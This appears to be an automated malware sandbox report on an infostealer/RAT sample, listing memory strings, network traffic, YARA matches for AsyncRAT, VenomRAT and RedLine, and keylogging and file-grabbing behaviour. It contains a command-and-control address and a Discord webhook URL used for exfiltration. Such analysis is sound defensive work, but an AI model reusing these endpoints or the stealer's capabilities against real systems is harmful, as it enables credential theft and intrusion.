Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 11:17:51 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1732706273x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xtlhEshvqq%2Bo1LRIFdNgydwzEUchkGwdYNFfCxt3qkuDQnU3rPgR%2BEienNwgcywITzR7%2FqSs2F3zMEv5EfuKSZSa1DepEpbMH7u1m%2FedsOMMmhalMeDXx%2Bjd7s2w"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=fc596719fa9c7befcecf0d62ea94a09bbc89430e-1732706271; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=G2Ui7ASZm34NrHHCPbuNfzPSNDIasFxnOE._ZZFLxA4-1732706271889-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8e91b6d5486b41db-EWR{"message": "Unknown Webhook", "code": 10015}

Source: system32.exe, 00000005.00000002.2330152989.0000000002D88000.00000004.00000800.00020000.00000000.sdmp, system32.exe, 00000005.00000002.2330152989.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp, system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://212.87.215.19:37552
Source: system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://212.87.215.19:37552/
Source: system32.exe, 00000005.00000002.2330152989.0000000002D88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://212.87.215.19:37552t-sq
Source: svchost.exe, 0000000A.00000002.4478728762.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.mylnikov.org
Source: powershell.exe, 00000007.00000002.2245161767.000001AFA33F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros
Source: svchost.exe, 0000000A.00000002.4476503013.00000000006AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: svchost.exe, 0000000A.00000002.4476503013.00000000006AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: svchost.exe, 0000000A.00000002.4478728762.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://discord.com
Source: svchost.exe, 0000000A.00000002.4478728762.000000000296F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com
Source: svchost.exe, 0000000A.00000002.4478728762.000000000296F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com/
Source: VzhY4BcvBH.exe, 00000000.00000002.2291428611.0000000003131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: VzhY4BcvBH.exe	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: svchost.exe, 0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: powershell.exe, 00000002.00000002.2116320438.000001ED902A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2225174789.000001AF9ADE3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.2167420265.000001AF8AF99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: system32.exe, 00000005.00000002.2330152989.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: powershell.exe, 00000002.00000002.2093315832.000001ED80459000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2167420265.000001AF8AF99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: VzhY4BcvBH.exe, 00000000.00000002.2291428611.0000000003131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2093315832.000001ED80231000.00000004.00000800.00020000.00000000.sdmp, system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2167420265.000001AF8AD71000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.4478728762.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2093315832.000001ED80459000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2167420265.000001AF8AF99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: system32.exe, 00000005.00000002.2330152989.0000000002D88000.00000004.00000800.00020000.00000000.sdmp, system32.exe, 00000005.00000002.2330152989.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: system32.exe, 00000005.00000002.2330152989.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp, system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: system32.exe, 00000005.00000002.2330152989.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: powershell.exe, 00000007.00000002.2167420265.000001AF8AF99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svchost.exe, 0000000A.00000002.4526492924.000000001D660000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: svchost.exe, 0000000A.00000002.4478728762.000000000296F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.4521155331.000000001D040000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.4502281344.0000000012612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.newtonsoft.com/jsonschema
Source: svchost.exe, 0000000A.00000002.4502281344.00000000125CB000.00000004.00000800.00020000.00000000.sdmp, tmpA997.tmp.5.dr, tmpE123.tmp.5.dr, tmp3943.tmp.5.dr, tmp71CB.tmp.5.dr, tmp7D.tmp.5.dr, tmpA9D6.tmp.5.dr, tmp5E6A.tmp.dat.10.dr, tmp71FB.tmp.5.dr, tmp6BA4.tmp.dat.10.dr, tmp3993.tmp.5.dr, tmpC76B.tmp.5.dr, tmp3963.tmp.5.dr, tmp71AB.tmp.5.dr, tmpBD.tmp.5.dr, tmp5EAC.tmp.dat.10.dr, tmp6BD7.tmp.dat.10.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.2093315832.000001ED80231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2167420265.000001AF8AD71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: VzhY4BcvBH.exe, 00000000.00000002.2306003026.00000000131A1000.00000004.00000800.00020000.00000000.sdmp, system32.exe, 00000005.00000000.2134627480.0000000000872000.00000002.00000001.01000000.00000008.sdmp, system32.exe.0.dr	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: VzhY4BcvBH.exe, 00000000.00000002.2306003026.00000000131A1000.00000004.00000800.00020000.00000000.sdmp, system32.exe, 00000005.00000000.2134627480.0000000000872000.00000002.00000001.01000000.00000008.sdmp, system32.exe.0.dr	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: svchost.exe, 0000000A.00000002.4478728762.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikP
Source: svchost.exe, 0000000A.00000002.4478728762.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org
Source: svchost.exe, 0000000A.00000002.4478728762.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&
Source: svchost.exe, 0000000A.00000002.4478728762.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=
Source: svchost.exe, 0000000A.00000002.4478728762.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15
Source: svchost.exe, 0000000A.00000002.4478728762.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.p
Source: svchost.exe, 0000000A.00000002.4502281344.00000000125CB000.00000004.00000800.00020000.00000000.sdmp, tmpA997.tmp.5.dr, tmpE123.tmp.5.dr, tmp3943.tmp.5.dr, tmp71CB.tmp.5.dr, tmp7D.tmp.5.dr, tmpA9D6.tmp.5.dr, tmp5E6A.tmp.dat.10.dr, tmp71FB.tmp.5.dr, tmp6BA4.tmp.dat.10.dr, tmp3993.tmp.5.dr, tmpC76B.tmp.5.dr, tmp3963.tmp.5.dr, tmp71AB.tmp.5.dr, tmpBD.tmp.5.dr, tmp5EAC.tmp.dat.10.dr, tmp6BD7.tmp.dat.10.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: svchost.exe, 0000000A.00000002.4502281344.00000000125CB000.00000004.00000800.00020000.00000000.sdmp, tmpA997.tmp.5.dr, tmpE123.tmp.5.dr, tmp3943.tmp.5.dr, tmp71CB.tmp.5.dr, tmp7D.tmp.5.dr, tmpA9D6.tmp.5.dr, tmp5E6A.tmp.dat.10.dr, tmp71FB.tmp.5.dr, tmp6BA4.tmp.dat.10.dr, tmp3993.tmp.5.dr, tmpC76B.tmp.5.dr, tmp3963.tmp.5.dr, tmp71AB.tmp.5.dr, tmpBD.tmp.5.dr, tmp5EAC.tmp.dat.10.dr, tmp6BD7.tmp.dat.10.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: svchost.exe, 0000000A.00000002.4502281344.00000000125CB000.00000004.00000800.00020000.00000000.sdmp, tmpA997.tmp.5.dr, tmpE123.tmp.5.dr, tmp3943.tmp.5.dr, tmp71CB.tmp.5.dr, tmp7D.tmp.5.dr, tmpA9D6.tmp.5.dr, tmp5E6A.tmp.dat.10.dr, tmp71FB.tmp.5.dr, tmp6BA4.tmp.dat.10.dr, tmp3993.tmp.5.dr, tmpC76B.tmp.5.dr, tmp3963.tmp.5.dr, tmp71AB.tmp.5.dr, tmpBD.tmp.5.dr, tmp5EAC.tmp.dat.10.dr, tmp6BD7.tmp.dat.10.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000007.00000002.2225174789.000001AF9ADE3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.2225174789.000001AF9ADE3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.2225174789.000001AF9ADE3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 0000000A.00000002.4478728762.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com
Source: svchost.exe, 0000000A.00000002.4478728762.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.4478728762.0000000002601000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5
Source: svchost.exe, 0000000A.00000002.4502281344.00000000125CB000.00000004.00000800.00020000.00000000.sdmp, tmpA997.tmp.5.dr, tmpE123.tmp.5.dr, tmp3943.tmp.5.dr, tmp71CB.tmp.5.dr, tmp7D.tmp.5.dr, tmpA9D6.tmp.5.dr, tmp5E6A.tmp.dat.10.dr, tmp71FB.tmp.5.dr, tmp6BA4.tmp.dat.10.dr, tmp3993.tmp.5.dr, tmpC76B.tmp.5.dr, tmp3963.tmp.5.dr, tmp71AB.tmp.5.dr, tmpBD.tmp.5.dr, tmp5EAC.tmp.dat.10.dr, tmp6BD7.tmp.dat.10.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: svchost.exe, 0000000A.00000002.4502281344.00000000125CB000.00000004.00000800.00020000.00000000.sdmp, tmpA997.tmp.5.dr, tmpE123.tmp.5.dr, tmp3943.tmp.5.dr, tmp71CB.tmp.5.dr, tmp7D.tmp.5.dr, tmpA9D6.tmp.5.dr, tmp5E6A.tmp.dat.10.dr, tmp71FB.tmp.5.dr, tmp6BA4.tmp.dat.10.dr, tmp3993.tmp.5.dr, tmpC76B.tmp.5.dr, tmp3963.tmp.5.dr, tmp71AB.tmp.5.dr, tmpBD.tmp.5.dr, tmp5EAC.tmp.dat.10.dr, tmp6BD7.tmp.dat.10.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: svchost.exe, 0000000A.00000002.4502281344.00000000125CB000.00000004.00000800.00020000.00000000.sdmp, tmpA997.tmp.5.dr, tmpE123.tmp.5.dr, tmp3943.tmp.5.dr, tmp71CB.tmp.5.dr, tmp7D.tmp.5.dr, tmpA9D6.tmp.5.dr, tmp5E6A.tmp.dat.10.dr, tmp71FB.tmp.5.dr, tmp6BA4.tmp.dat.10.dr, tmp3993.tmp.5.dr, tmpC76B.tmp.5.dr, tmp3963.tmp.5.dr, tmp71AB.tmp.5.dr, tmpBD.tmp.5.dr, tmp5EAC.tmp.dat.10.dr, tmp6BD7.tmp.dat.10.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 0000000A.00000002.4478728762.0000000002601000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: powershell.exe, 00000007.00000002.2167420265.000001AF8AF99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: VzhY4BcvBH.exe, 00000000.00000002.2306003026.00000000131A1000.00000004.00000800.00020000.00000000.sdmp, system32.exe, 00000005.00000000.2134627480.0000000000872000.00000002.00000001.01000000.00000008.sdmp, system32.exe.0.dr	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: powershell.exe, 00000002.00000002.2116320438.000001ED902A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2225174789.000001AF9ADE3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: places.raw.10.dr	String found in binary or memory: https://support.mozilla.org
Source: places.raw.10.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: places.raw.10.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: svchost.exe, 0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://urn.to/r/sds_see
Source: svchost.exe, 0000000A.00000002.4478728762.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.4478728762.0000000002601000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://user-images.githubusercontent.com/45857590/138568746-1a5578fe-f51b-4114-bcf2-e374535f8488.pn
Source: svchost.exe, 0000000A.00000002.4502281344.00000000125CB000.00000004.00000800.00020000.00000000.sdmp, tmpA997.tmp.5.dr, tmpE123.tmp.5.dr, tmp3943.tmp.5.dr, tmp71CB.tmp.5.dr, tmp7D.tmp.5.dr, tmpA9D6.tmp.5.dr, tmp5E6A.tmp.dat.10.dr, tmp71FB.tmp.5.dr, tmp6BA4.tmp.dat.10.dr, tmp3993.tmp.5.dr, tmpC76B.tmp.5.dr, tmp3963.tmp.5.dr, tmp71AB.tmp.5.dr, tmpBD.tmp.5.dr, tmp5EAC.tmp.dat.10.dr, tmp6BD7.tmp.dat.10.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: svchost.exe, 0000000A.00000002.4502281344.00000000125CB000.00000004.00000800.00020000.00000000.sdmp, tmpA997.tmp.5.dr, tmpE123.tmp.5.dr, tmp3943.tmp.5.dr, tmp71CB.tmp.5.dr, tmp7D.tmp.5.dr, tmpA9D6.tmp.5.dr, tmp5E6A.tmp.dat.10.dr, tmp71FB.tmp.5.dr, tmp6BA4.tmp.dat.10.dr, tmp3993.tmp.5.dr, tmpC76B.tmp.5.dr, tmp3963.tmp.5.dr, tmp71AB.tmp.5.dr, tmpBD.tmp.5.dr, tmp5EAC.tmp.dat.10.dr, tmp6BD7.tmp.dat.10.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: places.raw.10.dr	String found in binary or memory: https://www.mozilla.org
Source: places.raw.10.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: places.raw.10.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: tmp5F6A.tmp.dat.10.dr, places.raw.10.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: places.raw.10.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: tmp5F6A.tmp.dat.10.dr, places.raw.10.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: tmp5F6A.tmp.dat.10.dr, places.raw.10.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: svchost.exe, 0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: svchost.exe, 0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443

Source: unknown	HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.5:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.5:49792 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 0.2.VzhY4BcvBH.exe.31d6f70.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.svchost.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VzhY4BcvBH.exe.31d6f70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2291428611.0000000003183000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.2259349303.0000000000162000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VzhY4BcvBH.exe PID: 2608, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED

Yara detected VenomRAT

Source: Yara match

File source: Process Memory Space: svchost.exe PID: 5004, type: MEMORYSTR

Contains functionality to log keystrokes (.Net Source)

Source: svchost.exe.0.dr, Keylogger.cs	.Net Code: KeyboardLayout
Source: 0.2.VzhY4BcvBH.exe.31d6f70.1.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\AppData\Roaming\svchost.exe	File deleted: C:\Users\user\AppData\Local\8eab9ed206cfe2cfe40d275f8053e9d6\user@302494_en-CH\Grabber\DRIVE-C\Users\user\Desktop\BJZFPPWAPT\ZGGKNSUKOP.xlsx
Source: C:\Users\user\AppData\Roaming\svchost.exe	File deleted: C:\Users\user\AppData\Local\8eab9ed206cfe2cfe40d275f8053e9d6\user@302494_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GLTYDMDUST.png
Source: C:\Users\user\AppData\Roaming\svchost.exe	File deleted: C:\Users\user\AppData\Local\8eab9ed206cfe2cfe40d275f8053e9d6\user@302494_en-CH\Grabber\DRIVE-C\Users\user\Desktop\BJZFPPWAPT\KLIZUSIQEN.pdf
Source: C:\Users\user\AppData\Roaming\svchost.exe	File deleted: C:\Users\user\AppData\Local\8eab9ed206cfe2cfe40d275f8053e9d6\user@302494_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL\GRXZDKKVDB.xlsx
Source: C:\Users\user\AppData\Roaming\svchost.exe	File deleted: C:\Users\user\AppData\Local\8eab9ed206cfe2cfe40d275f8053e9d6\user@302494_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EEGWXUHVUG\EEGWXUHVUG.docx

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.0.system32.exe.870000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 5.0.system32.exe.870000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.VzhY4BcvBH.exe.131a1be0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.VzhY4BcvBH.exe.131a1be0.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.VzhY4BcvBH.exe.31d6f70.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.VzhY4BcvBH.exe.131a1be0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.VzhY4BcvBH.exe.131a1be0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.0.svchost.exe.160000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 10.2.svchost.exe.1d860000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 10.2.svchost.exe.1d860000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 10.2.svchost.exe.1d860000.9.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 10.2.svchost.exe.1d860000.9.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.VzhY4BcvBH.exe.31d6f70.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 10.2.svchost.exe.1d540000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.svchost.exe.1d540000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000005.00000000.2134627480.0000000000872000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000000.00000002.2306003026.00000000131A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0000000A.00000002.4478728762.0000000002601000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0000000A.00000002.4528103199.000000001D860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0000000A.00000002.4528103199.000000001D860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: Process Memory Space: VzhY4BcvBH.exe PID: 2608, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: system32.exe PID: 5560, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: svchost.exe PID: 5004, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\system32.exe, type: DROPPED	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: C:\Users\user\AppData\Roaming\system32.exe, type: DROPPED	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen

Source: C:\Users\user\AppData\Roaming\svchost.exe

Code function: 10_2_00007FF848F23D5E NtProtectVirtualMemory,

10_2_00007FF848F23D5E

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Code function: 0_2_00007FF848F37615	0_2_00007FF848F37615
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Code function: 0_2_00007FF848F35622	0_2_00007FF848F35622
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Code function: 0_2_00007FF848F34876	0_2_00007FF848F34876
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Code function: 0_2_00007FF848F30B71	0_2_00007FF848F30B71
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848FE30E9	2_2_00007FF848FE30E9
Source: C:\Users\user\AppData\Roaming\system32.exe	Code function: 5_2_011CE7B0	5_2_011CE7B0
